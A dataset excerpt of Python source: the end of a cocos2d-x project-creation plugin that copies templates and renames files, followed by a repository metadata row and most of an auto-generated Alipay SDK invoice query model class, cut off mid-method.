o = OrderedDict.fromkeys(self._templates_paths)
self._templates_paths = o.keys()
self._other_opts = args
self._mac_bundleid = args.mac_bundleid
self._ios_bundleid = args.ios_bundleid
self._templates = Templates(args.language, self._templates_paths, args.template)
if self._templates.none_active():
self._templates.select_one()
# parse arguments
def parse_args(self, argv):
"""Custom and check param list.
"""
from argparse import ArgumentParser
# set the parser to parse input params
# the correspond variable name of "-x, --xxx" is parser.xxx
name = CCPluginNew.plugin_name()
category = CCPluginNew.plugin_category()
parser = ArgumentParser(prog="cocos %s" % self.__class__.plugin_name(),
description=self.__class__.brief_description())
parser.add_argument(
"name", metavar="PROJECT_NAME", nargs='?', help=MultiLanguage.get_string('NEW_ARG_NAME'))
parser.add_argument(
"-p", "--package", metavar="PACKAGE_NAME", help=MultiLanguage.get_string('NEW_ARG_PACKAGE'))
parser.add_argument("-l", "--language",
required=True,
choices=["cpp", "lua", "js"],
help=MultiLanguage.get_string('NEW_ARG_LANG'))
parser.add_argument("-d", "--directory", metavar="DIRECTORY",
help=MultiLanguage.get_string('NEW_ARG_DIR'))
parser.add_argument("-t", "--template", metavar="TEMPLATE_NAME",
help=MultiLanguage.get_string('NEW_ARG_TEMPLATE'))
parser.add_argument(
"--ios-bundleid", dest="ios_bundleid", help=MultiLanguage.get_string('NEW_ARG_IOS_BUNDLEID'))
parser.add_argument(
"--mac-bundleid", dest="mac_bundleid", help=MultiLanguage.get_string('NEW_ARG_MAC_BUNDLEID'))
parser.add_argument("-e", "--engine-path", dest="engine_path",
help=MultiLanguage.get_string('NEW_ARG_ENGINE_PATH'))
parser.add_argument("--portrait", action="store_true", dest="portrait",
help=MultiLanguage.get_string('NEW_ARG_PORTRAIT'))
group = parser.add_argument_group(MultiLanguage.get_string('NEW_ARG_GROUP_SCRIPT'))
group.add_argument(
"--no-native", action="store_true", dest="no_native",
help=MultiLanguage.get_string('NEW_ARG_NO_NATIVE'))
# parse the params
args = parser.parse_args(argv)
if args.name is None:
args.name = CCPluginNew.DEFAULT_PROJ_NAME[args.language]
if not args.package:
args.package = "org.cocos2dx.%s" % args.name
if not args.ios_bundleid:
args.ios_bundleid = args.package
if not args.mac_bundleid:
args.mac_bundleid = args.package
if not args.directory:
args.directory = os.getcwd()
if not args.template:
args.template = 'default'
self.init(args)
return args
def _stat_engine_version(self):
try:
ver_str = None
engine_type = None
framework_ver_file = os.path.join(self._cocosroot, 'version')
x_ver_file = os.path.join(self._cocosroot, 'cocos/cocos2d.cpp')
js_ver_file = os.path.join(self._cocosroot, 'frameworks/js-bindings/bindings/manual/ScriptingCore.h')
if os.path.isfile(framework_ver_file):
# the engine is Cocos Framework
f = open(framework_ver_file)
ver_str = f.read()
f.close()
engine_type = 'cocosframework'
else:
ver_file = None
pattern = None
if os.path.isfile(x_ver_file):
# the engine is cocos2d-x
pattern = r".*return[ \t]+\"(.*)\";"
ver_file = x_ver_file
engine_type = 'cocos2d-x'
elif os.path.isfile(js_ver_file):
# the engine is cocos2d-js
pattern = r".*#define[ \t]+ENGINE_VERSION[ \t]+\"(.*)\""
ver_file = js_ver_file
engine_type = 'cocos2d-js'
if ver_file is not None:
f = open(ver_file)
import re
for line in f.readlines():
match = re.match(pattern, line)
if match:
ver_str = match.group(1)
break
f.close()
if ver_str is not None:
# stat the engine version info
cocos.DataStatistic.stat_event('new_engine_ver', ver_str, engine_type)
except:
pass
def _create_from_cmd(self):
# check the dst project dir exists
if os.path.exists(self._projdir):
message = MultiLanguage.get_string('NEW_ERROR_FOLDER_EXISTED_FMT', self._projdir)
raise cocos.CCPluginError(message, cocos.CCPluginError.ERROR_PATH_NOT_FOUND)
tp_dir = self._templates.template_path()
creator = TPCreator(self._lang, self._cocosroot, self._projname, self._projdir,
self._tpname, tp_dir, self._package, self._mac_bundleid, self._ios_bundleid)
# do the default creating step
creator.do_default_step()
data = None
cfg_path = os.path.join(self._projdir, cocos_project.Project.CONFIG)
if os.path.isfile(cfg_path):
f = open(cfg_path)
data = json.load(f)
f.close()
if data is None:
data = {}
if cocos_project.Project.KEY_PROJ_TYPE not in data:
data[cocos_project.Project.KEY_PROJ_TYPE] = self._lang
# script project may add native support
if self._lang in (cocos_project.Project.LUA, cocos_project.Project.JS):
if not self._other_opts.no_native:
creator.do_other_step('do_add_native_support')
data[cocos_project.Project.KEY_HAS_NATIVE] = True
else:
data[cocos_project.Project.KEY_HAS_NATIVE] = False
# record the engine version if not predefined
if not data.has_key(cocos_project.Project.KEY_ENGINE_VERSION):
engine_version = utils.get_engine_version(self._cocosroot)
if engine_version is not None:
data[cocos_project.Project.KEY_ENGINE_VERSION] = engine_version
# if --portrait is specified, change the orientation
if self._other_opts.portrait:
creator.do_other_step("change_orientation", not_existed_error=False)
# write config files
with open(cfg_path, 'w') as outfile:
json.dump(data, outfile, sort_keys=True, indent=4)
# main entry point
def run(self, argv, dependencies):
self.parse_args(argv)
action_str = 'new_%s' % (self._lang)
cocos.DataStatistic.stat_event('new', action_str, self._tpname)
self._create_from_cmd()
self._stat_engine_version()
def replace_string(filepath, src_string, dst_string):
""" From file's content replace specified string
Arg:
filepath: Specify a file contains the path
src_string: old string
dst_string: new string
"""
if src_string is None or dst_string is None:
raise TypeError
content = ""
f1 = open(filepath, "rb")
for line in f1:
strline = line.decode('utf8')
if src_string in strline:
content += strline.replace(src_string, dst_string)
else:
content += strline
f1.close()
f2 = open(filepath, "wb")
f2.write(content.encode('utf8'))
f2.close()
# end of replace_string
class Templates(object):
def __init__(self, lang, templates_paths, current):
self._lang = lang
self._templates_paths = templates_paths
self._scan()
self._current = None
if current is not None:
if current in self._template_folders:
self._current = current
else:
cocos.Logging.warning(MultiLanguage.get_string('NEW_TEMPLATE_NOT_FOUND_FMT', current))
def _scan(self):
template_pattern = {
"cpp": 'cpp-template-(.+)',
"lua": 'lua-template-(.+)',
"js": 'js-template-(.+)',
}
self._template_folders = {}
for templates_dir in self._templates_paths:
try:
dirs = [name for name in os.listdir(templates_dir) if os.path.isdir(
os.path.join(templates_dir, name))]
except Exception:
continue
pattern = template_pattern[self._lang]
for name in dirs:
match = re.search(pattern, name)
if match is None:
continue
template_name = match.group(1)
if template_name in self._template_folders.keys():
continue
self._template_folders[template_name] = os.path.join(templates_dir, name)
if len(self._template_folders) == 0:
cur_engine = "cocos2d-x" if self._lang == "js" else "cocos2d-js"
need_engine = "cocos2d-js" if self._lang == "js" else "cocos2d-x"
engine_tip = MultiLanguage.get_string('NEW_ERROR_ENGINE_TIP_FMT', need_engine)
message = MultiLanguage.get_string('NEW_ERROR_TEMPLATE_NOT_FOUND_FMT', (self._lang, engine_tip))
raise cocos.CCPluginError(message, cocos.CCPluginError.ERROR_PATH_NOT_FOUND)
def none_active(self):
return self._current is None
def template_path(self):
if self._current is None:
return None
return self._template_folders[self._current]
def select_one(self):
cocos.Logging.warning(MultiLanguage.get_string('NEW_SELECT_TEMPLATE_TIP1'))
p = self._template_folders.keys()
for i in range(len(p)):
cocos.Logging.warning('%d %s' % (i + 1, p[i]))
cocos.Logging.warning(MultiLanguage.get_string('NEW_SELECT_TEMPLATE_TIP2'))
while True:
option = raw_input()
if option.isdigit():
option = int(option) - 1
if option in range(len(p)):
break
self._current = p[option]
class TPCreator(object):
def __init__(self, lang, cocos_root, project_name, project_dir, tp_name, tp_dir, project_package, mac_id, ios_id):
self.lang = lang
self.cocos_root = cocos_root
self.project_dir = project_dir
self.project_name = project_name
self.package_name = project_package
self.mac_bundleid = mac_id
self.ios_bundleid = ios_id
self.tp_name = tp_name
self.tp_dir = tp_dir
self.tp_json = 'cocos-project-template.json'
tp_json_path = os.path.join(tp_dir, self.tp_json)
if not os.path.exists(tp_json_path):
message = MultiLanguage.get_string('NEW_WARNING_FILE_NOT_FOUND_FMT', tp_json_path)
raise cocos.CCPluginError(message, cocos.CCPluginError.ERROR_PATH_NOT_FOUND)
f = open(tp_json_path)
# keep the key order
tpinfo = json.load(f, encoding='utf8', object_pairs_hook=OrderedDict)
# read the default creating step
if 'do_default' not in tpinfo:
message = (MultiLanguage.get_string('NEW_ERROR_DEFAILT_CFG_NOT_FOUND_FMT', tp_json_path))
raise cocos.CCPluginError(message, cocos.CCPluginError.ERROR_WRONG_CONFIG)
self.tp_default_step = tpinfo.pop('do_default')
# keep the other steps
self.tp_other_step = tpinfo
def cp_self(self, project_dir, exclude_files):
cocos.Logging.info(MultiLanguage.get_string('NEW_INFO_STEP_COPY_TEMPLATE_FMT', project_dir))
if not os.path.exists(self.project_dir):
os.makedirs(self.project_dir)
copy_cfg = {
"from": self.tp_dir,
"to": self.project_dir,
"exclude": exclude_files
}
cocos.copy_files_with_config(copy_cfg, self.tp_dir, self.project_dir)
def do_default_step(self):
default_cmds = self.tp_default_step
exclude_files = []
if "exclude_from_template" in default_cmds:
exclude_files = exclude_files + \
default_cmds['exclude_from_template']
default_cmds.pop('exclude_from_template')
# should ignore teh xx-template-xx.json
exclude_files.append(self.tp_json)
self.cp_self(self.project_dir, exclude_files)
self.do_cmds(default_cmds)
def do_other_step(self, step, not_existed_error=True):
if step not in self.tp_other_step:
if not_existed_error:
# handle as error
message = MultiLanguage.get_string('NEW_ERROR_STEP_NOT_FOUND_FMT', step)
raise cocos.CCPluginError(message, cocos.CCPluginError.ERROR_WRONG_CONFIG)
else:
# handle as warning
cocos.Logging.warning(MultiLanguage.get_string('NEW_WARNING_STEP_NOT_FOUND_FMT', step))
return
cmds = self.tp_other_step[step]
self.do_cmds(cmds)
def do_cmds(self, cmds):
for k, v in cmds.iteritems():
# call cmd method by method/cmd name
# get from
# http://stackoverflow.com/questions/3951840/python-how-to-invoke-an-function-on-an-object-dynamically-by-name
try:
cmd = getattr(self, k)
except AttributeError:
raise cocos.CCPluginError(MultiLanguage.get_string('NEW_ERROR_CMD_NOT_FOUND_FMT', k),
cocos.CCPluginError.ERROR_WRONG_CONFIG)
try:
cmd(v)
except Exception as e:
raise cocos.CCPluginError(str(e), cocos.CCPluginError.ERROR_RUNNING_CMD)
# cmd methods below
def append_h5_engine(self, v):
src = os.path.join(self.cocos_root, v['from'])
dst = os.path.join(self.project_dir, v['to'])
# check cocos engine exist
moduleConfig = 'moduleConfig.json'
moudle_cfg = os.path.join(src, moduleConfig)
if not os.path.exists(moudle_cfg):
message = MultiLanguage.get_string('NEW_WARNING_FILE_NOT_FOUND_FMT', moudle_cfg)
raise cocos.CCPluginError(message, cocos.CCPluginError.ERROR_PATH_NOT_FOUND)
f = open(moudle_cfg)
data = json.load(f, 'utf8')
f.close()
modules = data['module']
# must copy moduleConfig.json & CCBoot.js
file_list = [moduleConfig, data['bootFile']]
for k, v in modules.iteritems():
module = modules[k]
for f in module:
if f[-2:] == 'js':
file_list.append(f)
# begin copy engine
cocos.Logging.info(MultiLanguage.get_string('NEW_INFO_STEP_COPY_H5'))
for index in range(len(file_list)):
srcfile = os.path.join(src, file_list[index])
dstfile = os.path.join(dst, file_list[index])
srcfile = cocos.add_path_prefix(srcfile)
dstfile = cocos.add_path_prefix(dstfile)
if not os.path.exists(os.path.dirname(dstfile)):
os.makedirs(cocos.add_path_prefix(os.path.dirname(dstfile)))
# copy file or folder
if os.path.exists(srcfile):
if os.path.isdir(srcfile):
if os.path.exists(dstfile):
shutil.rmtree(dstfile)
shutil.copytree(srcfile, dstfile)
else:
if os.path.exists(dstfile):
os.remove(dstfile)
shutil.copy2(srcfile, dstfile)
def append_x_engine(self, v):
# FIXME this is a hack, but in order to fix it correctly the cocos-project-template.json
# file probably will need to be re-designed.
# As a quick (horrible) fix, we check if we are in distro mode.
# If so, we don't do the "append_x_engine" step
if cocos.CCPlugin.get_cocos2d_mode() == 'distro':
return
src = os.path.join(self.cocos_root, v['from'])
dst = os.path.join(self.project_dir, v['to'])
# check cocos engine exist
cocosx_files_json = os.path.join(
src, 'templates', 'cocos2dx_files.json')
if not os.path.exists(cocosx_files_json):
message = MultiLanguage.get_string('NEW_WARNING_FILE_NOT_FOUND_FMT', cocosx_files_json)
raise cocos.CCPluginError(message, cocos.CCPluginError.ERROR_PATH_NOT_FOUND)
f = open(cocosx_files_json)
data = json.load(f)
f.close()
fileList = data['common']
if self.lang == 'lua':
fileList = fileList + data['lua']
if self.lang == 'js' and 'js' in data.keys():
fileList = fileList + data['js']
# begin copy engine
cocos.Logging.info(MultiLanguage.get_string('NEW_INFO_STEP_COPY_X'))
for index in range(len(fileList)):
srcfile = os.path.join(src, fileList[index])
dstfile = os.path.join(dst, fileList[index])
srcfile = cocos.add_path_prefix(srcfile)
dstfile = cocos.add_path_prefix(dstfile)
if not os.path.exists(os.path.dirname(dstfile)):
os.makedirs(cocos.add_path_prefix(os.path.dirname(dstfile)))
# copy file or folder
if os.path.exists(srcfile):
if os.path.isdir(srcfile):
if os.path.exists(dstfile):
shutil.rmtree(dstfile)
shutil.copytree(srcfile, dstfile)
else:
if os.path.exists(dstfile):
os.remove(dstfile)
shutil.copy2(srcfile, dstfile)
def append_from_template(self, v):
cocos.Logging.info(MultiLanguage.get_string('NEW_INFO_STEP_APPEND_TEMPLATE'))
cocos.copy_files_with_config(v, self.tp_dir, self.project_dir)
def append_dir(self, v):
cocos.Logging.info(MultiLanguage.get_string('NEW_INFO_STEP_APPEND_DIR'))
for item in v:
cocos.copy_files_with_config(
item, self.cocos_root, self.project_dir)
def append_file(self, v):
cocos.Logging.info(MultiLanguage.get_string('NEW_INFO_STEP_APPEND_FILE'))
for item in v:
src = os.path.join(self.cocos_root, item['from'])
dst = os.path.join(self.project_dir, item['to'])
src = cocos.add_path_prefix(src)
dst = cocos.add_path_prefix(dst)
shutil.copy2(src, dst)
# project cmd
def project_rename(self, v):
""" will modify the file name of the file
"""
dst_project_dir = self.project_dir
dst_project_name = self.project_name
src_project_name = v['src_project_name']
if dst_project_name == src_project_name:
return
cocos.Logging.info(MultiLanguage.get_string('NEW_INFO_STEP_RENAME_PROJ_FMT',
(src_project_name, dst_project_name)))
files = v['files']
for f in files:
src = f.replace("PROJECT_NAME", src_project_name)
dst = f.replace("PROJECT_NAME", dst_project_name)
src_file_path = os.path.join(dst_project_dir, src)
dst_file_path = os.path.join(dst_project_dir, dst)
if os.path.exists(src_file_path):
if dst_project_name.lower() == src_project_name.lower():
temp_file_path = "%s-temp" % src_file_path
os.rename(src_file_path, temp_file_path)
os.rename(temp_file_path, dst_file_path)
else:
if os.path.exists(dst_file_path):
os.remove(dst_file_path)
os.rename(src_file_path, dst_file_path)
else:
cocos.Logging.warning(MultiLanguage.get_string('NEW_WARNING_FILE_NOT_FOUND_FMT',
os.path.join(dst_project_dir, src)))
def project_replace_project_name(self, v):
""" will modify the content of the file
"""
dst_project_dir = self.project_dir
dst_project_name = self.project_name
src_project_name = v['src_project_name']
if dst_project_name == src_project_name:
return
cocos.Logging.info(MultiLanguage.get_string('NEW_INFO_STEP_REPLACE_PROJ_FMT',
(src_project_name, dst_project_name)))
files = v['files']
for f in files:
dst = f.replace("PROJECT_NAME", dst_project_name)
if os.path.exists(os.path.join(dst_project_dir, dst)):
replace_string(
os.path.join(dst_project_dir, dst), src_project_name, dst_project_name)
else:
cocos.Logging.warning(MultiLanguage.get_string('NEW_WARNING_FILE_NOT_FOUND_FMT',
os.path.join(dst_project_dir, dst)))
def project_replace_package_name(self, v):
""" will modify the content of the file
"""
dst_project_dir = self.project_dir
dst_project_name = self.project_name
src_package_name = v['src_package_name']
dst_package_name = self.package_name
if dst_package_name == src_package_name:
return
cocos.Logging.info(MultiLanguage.get_string('NEW_INFO_STEP_REPLACE_PKG_FMT',
(src_package_name, dst_package_name)))
files = v['files']
if not dst_package_name:
raise cocos.CCPluginError(MultiLanguage.get_string('NEW_ERROR_PKG_NAME_NOT_SPECIFIED'),
cocos.CCPluginError.ERROR_WRONG_ARGS)
for f in files:
dst = f.replace("PROJECT_NAME", dst_project_name)
if os.path.exists(os.path.join(dst_project_dir, dst)):
replace_string(
os.path.join(dst_project_dir, dst), src_package_name, dst_package_name)
else:
cocos.Logging.warning(MultiLanguage.get_string('NEW_WARNING_FILE_NOT_FOUND_FMT',
os.path.join(dst_project_dir, dst)))
def project_replace_mac_bundleid(self, v):
""" will modify the content of the file
"""
if self.mac_bundleid is None:
return
dst_project_dir = self.project_dir
dst_project_name = self.project_name
src_bundleid = v['src_bundle_id']
dst_bundleid = self.mac_bundleid
if src_bundleid == dst_bundleid:
return
cocos.Logging.info(MultiLanguage.get_string('NEW_INFO_STEP_MAC_BUNDLEID_FMT',
(src_bundleid, dst_bundleid)))
files = v['files']
for f in files:
dst = f.replace("PROJECT_NAME", dst_project_name)
if os.path.exists(os.path.join(dst_project_dir, dst)):
replace_string(
os.path.join(dst_project_dir, dst), src_bundleid, dst_bundleid)
else:
cocos.Logging.warning(MultiLanguage.get_string('NEW_WARNING_FILE_NOT_FOUND_FMT',
os.path.join(dst_project_dir, dst)))
def project_replace_ios_bundleid(self, v):
""" will modify the content of the file
"""
if self.ios_bundleid is None:
return
dst_project_dir = self.project_dir
dst_project_name = self.project_name
src_bundleid = v['src_bundle_id']
dst_bundleid = self.ios_bundleid
if src_bundleid == dst_bundleid:
return
cocos.Logging.info(MultiLanguage.get_string('NEW_INFO_STEP_IOS_BUNDLEID_FMT',
(src_bundleid, dst_bundleid)))
files = v['files']
for f in files:
dst = f.replace("PROJECT_NAME", dst_project_name)
if os.path.exists(os.path.join(dst_project_dir, dst)):
replace_string(
os.path.join(dst_project_dir, dst), src_bundleid, dst_bundleid)
else:
cocos.Logging.warning(MultiLanguage.get_string('NEW_WARNING_FILE_NOT_FOUND_FMT',
os.path.join(dst_project_dir, dst)))
def modify_files(self, v):
""" will modify the content of the file
format of v is :
[
{
"file_path": The path related with project directory,
"pattern": Find pattern,
"replace_string": Replaced string
},
...
]
"""
cocos.Logging.info(MultiLanguage.get_string('NEW_INFO_STEP_MODIFY_FILE'))
for modify_info in v:
modify_file = modify_info["file_path"]
if not os.path.isabs(modify_file):
modify_file = os.path.abspath(os.path.join(self.project_dir, modify_file))
if not os.path.isfile(modify_file):
cocos.Logging.warning(MultiLanguage.get_string('NEW_WARNING_NOT_A_FILE_FMT', modify_file))
continue
pattern = modify_info["pattern"]
replace_str = modify_info["replace_string"]
f = open(modify_file)
lines = f.readlines()
f.close()
new_lines = []
for line in lines:
new_line = re.sub(pattern, replace_str, line)
new_lines.append(new_line)
f = open(modify_file, "w")
f.writelines(new_lines)
f.close()
| [
"jimmy.yin5@gmail.com"
] | jimmy.yin5@gmail.com |
d63e37f24e963205d5ab81509b9fb9b544d6dc56 | 0b01cb61a4ae4ae236a354cbfa23064e9057e434 | /alipay/aop/api/domain/InvoiceQueryOpenModel.py | e4a1f2eb763c0a192adc00a055403a1ea79f277d | [
"Apache-2.0"
] | permissive | hipacloud/alipay-sdk-python-all | e4aec2869bf1ea6f7c6fb97ac7cc724be44ecd13 | bdbffbc6d5c7a0a3dd9db69c99443f98aecf907d | refs/heads/master | 2022-11-14T11:12:24.441822 | 2020-07-14T03:12:15 | 2020-07-14T03:12:15 | 277,970,730 | 0 | 0 | Apache-2.0 | 2020-07-08T02:33:15 | 2020-07-08T02:33:14 | null | UTF-8 | Python | false | false | 18,343 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.InvoiceItemQueryOpenModel import InvoiceItemQueryOpenModel
from alipay.aop.api.domain.InvoiceTitleQueryOpenModel import InvoiceTitleQueryOpenModel
class InvoiceQueryOpenModel(object):
def __init__(self):
self._apply_from = None
self._check_code = None
self._checker = None
self._clerk = None
self._einv_code = None
self._einv_no = None
self._ex_tax_amount = None
self._invoice_amount = None
self._invoice_content = None
self._invoice_date = None
self._invoice_id = None
self._invoice_kind = None
self._invoice_memo = None
self._invoice_title = None
self._invoice_type = None
self._m_short_name = None
self._ori_blue_inv_code = None
self._ori_blue_inv_no = None
self._out_apply_id = None
self._out_trade_no = None
self._payee = None
self._payee_address = None
self._payee_bank_account = None
self._payee_bank_name = None
self._payee_register_name = None
self._payee_register_no = None
self._payee_tel = None
self._preview_image_url = None
self._sub_m_short_name = None
self._sum_tax_amount = None
self._trade_date = None
self._user_id = None
@property
def apply_from(self):
return self._apply_from
@apply_from.setter
def apply_from(self, value):
self._apply_from = value
@property
def check_code(self):
return self._check_code
@check_code.setter
def check_code(self, value):
self._check_code = value
@property
def checker(self):
return self._checker
@checker.setter
def checker(self, value):
self._checker = value
@property
def clerk(self):
return self._clerk
@clerk.setter
def clerk(self, value):
self._clerk = value
@property
def einv_code(self):
return self._einv_code
@einv_code.setter
def einv_code(self, value):
self._einv_code = value
@property
def einv_no(self):
return self._einv_no
@einv_no.setter
def einv_no(self, value):
self._einv_no = value
@property
def ex_tax_amount(self):
return self._ex_tax_amount
@ex_tax_amount.setter
def ex_tax_amount(self, value):
self._ex_tax_amount = value
@property
def invoice_amount(self):
return self._invoice_amount
@invoice_amount.setter
def invoice_amount(self, value):
self._invoice_amount = value
@property
def invoice_content(self):
return self._invoice_content
@invoice_content.setter
def invoice_content(self, value):
if isinstance(value, list):
self._invoice_content = list()
for i in value:
if isinstance(i, InvoiceItemQueryOpenModel):
self._invoice_content.append(i)
else:
self._invoice_content.append(InvoiceItemQueryOpenModel.from_alipay_dict(i))
@property
def invoice_date(self):
return self._invoice_date
@invoice_date.setter
def invoice_date(self, value):
self._invoice_date = value
@property
def invoice_id(self):
return self._invoice_id
@invoice_id.setter
def invoice_id(self, value):
self._invoice_id = value
@property
def invoice_kind(self):
return self._invoice_kind
@invoice_kind.setter
def invoice_kind(self, value):
self._invoice_kind = value
@property
def invoice_memo(self):
return self._invoice_memo
@invoice_memo.setter
def invoice_memo(self, value):
self._invoice_memo = value
@property
def invoice_title(self):
return self._invoice_title
@invoice_title.setter
def invoice_title(self, value):
if isinstance(value, InvoiceTitleQueryOpenModel):
self._invoice_title = value
else:
self._invoice_title = InvoiceTitleQueryOpenModel.from_alipay_dict(value)
@property
def invoice_type(self):
return self._invoice_type
@invoice_type.setter
def invoice_type(self, value):
self._invoice_type = value
@property
def m_short_name(self):
return self._m_short_name
@m_short_name.setter
def m_short_name(self, value):
self._m_short_name = value
@property
def ori_blue_inv_code(self):
return self._ori_blue_inv_code
@ori_blue_inv_code.setter
def ori_blue_inv_code(self, value):
self._ori_blue_inv_code = value
@property
def ori_blue_inv_no(self):
return self._ori_blue_inv_no
@ori_blue_inv_no.setter
def ori_blue_inv_no(self, value):
self._ori_blue_inv_no = value
@property
def out_apply_id(self):
return self._out_apply_id
@out_apply_id.setter
def out_apply_id(self, value):
self._out_apply_id = value
@property
def out_trade_no(self):
return self._out_trade_no
@out_trade_no.setter
def out_trade_no(self, value):
self._out_trade_no = value
@property
def payee(self):
return self._payee
@payee.setter
def payee(self, value):
self._payee = value
@property
def payee_address(self):
return self._payee_address
@payee_address.setter
def payee_address(self, value):
self._payee_address = value
@property
def payee_bank_account(self):
return self._payee_bank_account
@payee_bank_account.setter
def payee_bank_account(self, value):
self._payee_bank_account = value
@property
def payee_bank_name(self):
return self._payee_bank_name
@payee_bank_name.setter
def payee_bank_name(self, value):
self._payee_bank_name = value
@property
def payee_register_name(self):
return self._payee_register_name
@payee_register_name.setter
def payee_register_name(self, value):
self._payee_register_name = value
@property
def payee_register_no(self):
return self._payee_register_no
@payee_register_no.setter
def payee_register_no(self, value):
self._payee_register_no = value
@property
def payee_tel(self):
return self._payee_tel
@payee_tel.setter
def payee_tel(self, value):
self._payee_tel = value
@property
def preview_image_url(self):
return self._preview_image_url
@preview_image_url.setter
def preview_image_url(self, value):
self._preview_image_url = value
@property
def sub_m_short_name(self):
return self._sub_m_short_name
@sub_m_short_name.setter
def sub_m_short_name(self, value):
self._sub_m_short_name = value
@property
def sum_tax_amount(self):
return self._sum_tax_amount
@sum_tax_amount.setter
def sum_tax_amount(self, value):
self._sum_tax_amount = value
@property
def trade_date(self):
return self._trade_date
@trade_date.setter
def trade_date(self, value):
self._trade_date = value
@property
def user_id(self):
return self._user_id
@user_id.setter
def user_id(self, value):
self._user_id = value
def to_alipay_dict(self):
params = dict()
if self.apply_from:
if hasattr(self.apply_from, 'to_alipay_dict'):
params['apply_from'] = self.apply_from.to_alipay_dict()
else:
params['apply_from'] = self.apply_from
if self.check_code:
if hasattr(self.check_code, 'to_alipay_dict'):
params['check_code'] = self.check_code.to_alipay_dict()
else:
params['check_code'] = self.check_code
if self.checker:
if hasattr(self.checker, 'to_alipay_dict'):
params['checker'] = self.checker.to_alipay_dict()
else:
params['checker'] = self.checker
if self.clerk:
if hasattr(self.clerk, 'to_alipay_dict'):
params['clerk'] = self.clerk.to_alipay_dict()
else:
params['clerk'] = self.clerk
if self.einv_code:
if hasattr(self.einv_code, 'to_alipay_dict'):
params['einv_code'] = self.einv_code.to_alipay_dict()
else:
params['einv_code'] = self.einv_code
if self.einv_no:
if hasattr(self.einv_no, 'to_alipay_dict'):
params['einv_no'] = self.einv_no.to_alipay_dict()
else:
params['einv_no'] = self.einv_no
if self.ex_tax_amount:
if hasattr(self.ex_tax_amount, 'to_alipay_dict'):
params['ex_tax_amount'] = self.ex_tax_amount.to_alipay_dict()
else:
params['ex_tax_amount'] = self.ex_tax_amount
if self.invoice_amount:
if hasattr(self.invoice_amount, 'to_alipay_dict'):
params['invoice_amount'] = self.invoice_amount.to_alipay_dict()
else:
params['invoice_amount'] = self.invoice_amount
if self.invoice_content:
if isinstance(self.invoice_content, list):
for i in range(0, len(self.invoice_content)):
element = self.invoice_content[i]
if hasattr(element, 'to_alipay_dict'):
self.invoice_content[i] = element.to_alipay_dict()
if hasattr(self.invoice_content, 'to_alipay_dict'):
params['invoice_content'] = self.invoice_content.to_alipay_dict()
else:
params['invoice_content'] = self.invoice_content
if self.invoice_date:
if hasattr(self.invoice_date, 'to_alipay_dict'):
params['invoice_date'] = self.invoice_date.to_alipay_dict()
else:
params['invoice_date'] = self.invoice_date
if self.invoice_id:
if hasattr(self.invoice_id, 'to_alipay_dict'):
params['invoice_id'] = self.invoice_id.to_alipay_dict()
else:
params['invoice_id'] = self.invoice_id
if self.invoice_kind:
if hasattr(self.invoice_kind, 'to_alipay_dict'):
params['invoice_kind'] = self.invoice_kind.to_alipay_dict()
else:
params['invoice_kind'] = self.invoice_kind
if self.invoice_memo:
if hasattr(self.invoice_memo, 'to_alipay_dict'):
params['invoice_memo'] = self.invoice_memo.to_alipay_dict()
else:
params['invoice_memo'] = self.invoice_memo
if self.invoice_title:
if hasattr(self.invoice_title, 'to_alipay_dict'):
params['invoice_title'] = self.invoice_title.to_alipay_dict()
else:
params['invoice_title'] = self.invoice_title
if self.invoice_type:
if hasattr(self.invoice_type, 'to_alipay_dict'):
params['invoice_type'] = self.invoice_type.to_alipay_dict()
else:
params['invoice_type'] = self.invoice_type
if self.m_short_name:
if hasattr(self.m_short_name, 'to_alipay_dict'):
params['m_short_name'] = self.m_short_name.to_alipay_dict()
else:
params['m_short_name'] = self.m_short_name
if self.ori_blue_inv_code:
if hasattr(self.ori_blue_inv_code, 'to_alipay_dict'):
params['ori_blue_inv_code'] = self.ori_blue_inv_code.to_alipay_dict()
else:
params['ori_blue_inv_code'] = self.ori_blue_inv_code
if self.ori_blue_inv_no:
if hasattr(self.ori_blue_inv_no, 'to_alipay_dict'):
params['ori_blue_inv_no'] = self.ori_blue_inv_no.to_alipay_dict()
else:
params['ori_blue_inv_no'] = self.ori_blue_inv_no
if self.out_apply_id:
if hasattr(self.out_apply_id, 'to_alipay_dict'):
params['out_apply_id'] = self.out_apply_id.to_alipay_dict()
else:
params['out_apply_id'] = self.out_apply_id
if self.out_trade_no:
if hasattr(self.out_trade_no, 'to_alipay_dict'):
params['out_trade_no'] = self.out_trade_no.to_alipay_dict()
else:
params['out_trade_no'] = self.out_trade_no
if self.payee:
if hasattr(self.payee, 'to_alipay_dict'):
params['payee'] = self.payee.to_alipay_dict()
else:
params['payee'] = self.payee
if self.payee_address:
if hasattr(self.payee_address, 'to_alipay_dict'):
params['payee_address'] = self.payee_address.to_alipay_dict()
else:
params['payee_address'] = self.payee_address
if self.payee_bank_account:
if hasattr(self.payee_bank_account, 'to_alipay_dict'):
params['payee_bank_account'] = self.payee_bank_account.to_alipay_dict()
else:
params['payee_bank_account'] = self.payee_bank_account
if self.payee_bank_name:
if hasattr(self.payee_bank_name, 'to_alipay_dict'):
params['payee_bank_name'] = self.payee_bank_name.to_alipay_dict()
else:
params['payee_bank_name'] = self.payee_bank_name
if self.payee_register_name:
if hasattr(self.payee_register_name, 'to_alipay_dict'):
params['payee_register_name'] = self.payee_register_name.to_alipay_dict()
else:
params['payee_register_name'] = self.payee_register_name
if self.payee_register_no:
if hasattr(self.payee_register_no, 'to_alipay_dict'):
params['payee_register_no'] = self.payee_register_no.to_alipay_dict()
else:
params['payee_register_no'] = self.payee_register_no
if self.payee_tel:
if hasattr(self.payee_tel, 'to_alipay_dict'):
params['payee_tel'] = self.payee_tel.to_alipay_dict()
else:
params['payee_tel'] = self.payee_tel
if self.preview_image_url:
if hasattr(self.preview_image_url, 'to_alipay_dict'):
params['preview_image_url'] = self.preview_image_url.to_alipay_dict()
else:
params['preview_image_url'] = self.preview_image_url
if self.sub_m_short_name:
if hasattr(self.sub_m_short_name, 'to_alipay_dict'):
params['sub_m_short_name'] = self.sub_m_short_name.to_alipay_dict()
else:
params['sub_m_short_name'] = self.sub_m_short_name
if self.sum_tax_amount:
if hasattr(self.sum_tax_amount, 'to_alipay_dict'):
params['sum_tax_amount'] = self.sum_tax_amount.to_alipay_dict()
else:
params['sum_tax_amount'] = self.sum_tax_amount
if self.trade_date:
if hasattr(self.trade_date, 'to_alipay_dict'):
params['trade_date'] = self.trade_date.to_alipay_dict()
else:
